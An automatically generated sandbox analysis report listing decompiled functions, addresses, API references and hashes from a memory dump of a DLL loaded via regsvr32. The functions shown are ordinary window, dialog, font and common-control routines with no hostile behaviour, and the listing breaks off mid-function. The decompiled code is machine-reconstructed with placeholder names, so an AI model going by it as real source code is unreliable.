Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocStringlstrlen$ByteCharMultiWide
String ID:
API String ID: 2903237683-0
Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002F6AD Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002F6AD(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x1c),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}

0x1002f6b4
0x1002f6bb
0x1002f6c2
0x1002f6cc
0x1002f6da
0x1002f6e0
0x1002f6e6
0x1002f6e9
0x1002f6ef
0x1002f6f4
0x1002f6f7
0x1002f6fa
0x1002f6fd
0x1002f714
0x1002f723
0x1002f73a
0x1002f749
0x1002f74f
0x1002f752
0x1002f752
0x1002f757
0x1002f774
0x1002f77f
0x1002f796
0x1002f7a1
0x1002f7a1
0x00000000
0x1002f7a7
0x1002f7ab

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
GetWindowRect.USER32 ref: 1002F6DA
SetRect.USER32 ref: 1002F714
InvalidateRect.USER32(?,?,00000001), ref: 1002F723
SetRect.USER32 ref: 1002F73A
InvalidateRect.USER32(?,?,00000001), ref: 1002F749
SetRect.USER32 ref: 1002F774
InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
SetRect.USER32 ref: 1002F796
InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10020B9B Relevance: 15.1, APIs: 10, Instructions: 81
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10020B9B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011BF0(0x1003a552, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E100373B5() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E10037A1B(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E100373B5() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10037A7E(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}

0x10020ba0
0x10020bab
0x10020bae
0x10020bc3
0x10020bd7
0x10020c20
0x10020c20
0x10020bd9
0x10020bdc
0x10020be8
0x10020c78
0x10020c78
0x10020bee
0x10020bef
0x10020bf4
0x10020c03
0x10020c07
0x10020c0a
0x10020c13
0x10020c1e
0x10020c2c
0x10020c3a
0x10020c60
0x10020c67
0x10020c3c
0x10020c48
0x10020c51
0x10020c55
0x10020c59
0x10020c59
0x10020c6d
0x10020c73
0x00000000
0x00000000
0x00000000
0x00000000
0x10020c1e
0x10020be8
0x10020bc5
0x10020bc7
0x10020bc7
0x10020c80
0x10020c89

APIs

__EH_prolog.LIBCMT ref: 10020BA0
GetClassInfoA.USER32 ref: 10020BBB
RegisterClassA.USER32 ref: 10020BCE
lstrlenA.KERNEL32(-00000034,00000001), ref: 10020C0A
lstrlenA.KERNEL32(?), ref: 10020C11

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Classlstrlen$H_prologInfoRegister
String ID:
API String ID: 3690589370-0
Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F0D1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1001F0D1(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011BF0(0x1003a3de, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
				}
				_t135 =  *(E100373B5() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E10021D47(_t109, 0x10);
				E10021D47(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E100243B2();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1004efe4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E100237EE();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10022196();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E10024A0E(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10024716(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}

0x1001f0d1
0x1001f0d6
0x1001f0e6
0x1001f0e8
0x1001f0eb
0x1001f0ee
0x1001f0f8
0x1001f0f8
0x1001f100
0x1001f108
0x1001f10b
0x1001f10e
0x1001f111
0x1001f114
0x1001f11e
0x1001f125
0x1001f152
0x1001f155
0x1001f155
0x1001f157
0x1001f139
0x1001f139
0x1001f2cd
0x1001f2d2
0x1001f2db
0x1001f2db
0x1001f159
0x1001f15e
0x1001f168
0x1001f174
0x1001f178
0x1001f185
0x1001f18a
0x1001f190
0x1001f192
0x1001f1ca
0x1001f1ca
0x1001f1cc
0x1001f20d
0x1001f20d
0x1001f211
0x1001f215
0x1001f216
0x1001f21b
0x1001f21e
0x1001f220
0x1001f226
0x1001f222
0x1001f222
0x1001f222
0x1001f240
0x1001f242
0x1001f266
0x1001f269
0x1001f26d
0x1001f26f
0x1001f277
0x1001f27a
0x1001f27c
0x1001f283
0x1001f283
0x1001f27c
0x1001f289
0x1001f28e
0x1001f290
0x1001f296
0x1001f296
0x1001f29c
0x1001f29e
0x1001f2a0
0x1001f2a4
0x1001f2a7
0x1001f2ad
0x1001f2ad
0x1001f2ad
0x1001f2a4
0x1001f2af
0x1001f2b2
0x1001f2b7
0x1001f2c0
0x1001f2c0
0x1001f2c8
0x1001f2ca
0x1001f2ca
0x1001f2ca
0x00000000
0x1001f2ca
0x1001f1ce
0x1001f1d2
0x1001f1dd
0x1001f1e1
0x1001f1f1
0x1001f1f4
0x1001f1f8
0x1001f1fd
0x1001f200
0x1001f20b
0x1001f20b
0x00000000
0x1001f200
0x1001f194
0x1001f196
0x00000000
0x00000000
0x1001f19a
0x1001f1a0
0x1001f1a2
0x00000000
0x00000000
0x1001f1ac
0x1001f1b3
0x1001f1b7
0x1001f1ba
0x1001f1be
0x00000000
0x00000000
0x1001f1c0
0x1001f1c5
0x1001f1c7
0x1001f1c7
0x00000000
0x1001f1c5
0x1001f12c
0x1001f137
0x1001f14e
0x00000000
0x1001f14e
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1001F0D6
GetSystemMetrics.USER32 ref: 1001F19A
GlobalLock.KERNEL32 ref: 1001F205
CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234

Strings

MS Shell Dlg, xrefs: 1001F1A4

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 2364537584-76309092
Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023123 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10023092(__ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1002040A(_t41);
						L11:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L12;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x1c);
							_v8 = GetFocus();
							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

0x10023123
0x10023126
0x10023129
0x1002312b
0x10023133
0x10023139
0x1002313d
0x10023142
0x100231c9
0x100231ce
0x100231dd
0x100231dd
0x00000000
0x100231d4
0x100231d6
0x100231c4
0x100231c6
0x100231df
0x100231e2
0x100231e2
0x100231ce
0x10023148
0x1002314b
0x00000000
0x00000000
0x1002314d
0x10023150
0x10023163
0x1002316d
0x1002316f
0x10023170
0x10023182
0x10023188
0x1002319b
0x100231ac
0x100231af
0x100231af
0x100231b9
0x100231be
0x100231be
0x100231b9
0x1002316d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 10023173
SetActiveWindow.USER32(?), ref: 10023185
SendMessageA.USER32 ref: 1002319B
IsWindow.USER32(?), ref: 100231A8
SetActiveWindow.USER32(?), ref: 100231AF
IsWindow.USER32(?), ref: 100231B4
SetFocus.USER32(?), ref: 100231BE

Strings

u, xrefs: 100231C9

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10024970 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x1004c470; // 0xf256d946
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}

0x10024976
0x1002497d
0x10024986
0x10024989
0x1002498c
0x1002498f
0x10024994
0x10024998
0x100249a2
0x100249b1
0x100249b5
0x100249c2
0x100249c4
0x100249c6
0x100249c6
0x100249e1
0x100249e3
0x100249e3
0x100249e9
0x100249ee
0x100249f0
0x100249f0
0x10024a0b
0x10024a0b
0x1002499c
0x100249a0
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 10024994
GetStockObject.GDI32(0000000D), ref: 1002499C
GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
GetDC.USER32(00000000), ref: 100249B8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
ReleaseDC.USER32 ref: 100249E3

Strings

System, xrefs: 1002498F, 100249F9

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002155E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E1002155E(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

0x10021561
0x1002156e
0x10021570
0x10021576
0x1002157a
0x100215d3
0x1002157c
0x10021582
0x10021584
0x1002158c
0x100215a9
0x100215b1
0x100215b5
0x100215b9
0x100215bb
0x100215c1
0x100215c1
0x100215b9
0x1002158e
0x1002159d
0x1002159f
0x100215a5
0x100215a5
0x1002159d
0x100215c8
0x00000000
0x100215ce

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
#17.COMCTL32 ref: 1002159F
#17.COMCTL32 ref: 100215BB
FreeLibrary.KERNEL32(00000000), ref: 100215C8

Strings

COMCTL32.DLL, xrefs: 10021561, 10021566, 1002156D
InitCommonControlsEx, xrefs: 1002157C

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 1001C425 Relevance: 13.8, APIs: 9, Instructions: 291
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				int _t165;
				void* _t166;
				void* _t167;
				short* _t168;
				void* _t173;

				_push(0x40);
				_push(0x10042fa0);
				E10012514(__ebx, __edi, __esi);
				_t94 =  *0x1004c470; // 0xf256d946
				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
				_t162 = 0;
				_t165 = 1;
				_t173 =  *0x1004f8b0 - _t162; // 0x0
				if(_t173 == 0) {
					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1004f8b0 = 2;
						}
					} else {
						 *0x1004f8b0 = 1;
					}
				}
				if( *(_t167 + 0x14) > _t162) {
					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
				}
				_t95 =  *(_t167 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C409( *(_t167 + 0x18), _t95);
					 *(_t167 + 0x1c) = _t95;
				}
				_t144 =  *0x1004f8b0; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t167 - 0x38) = _t162;
					__eflags =  *(_t167 + 8) - _t162;
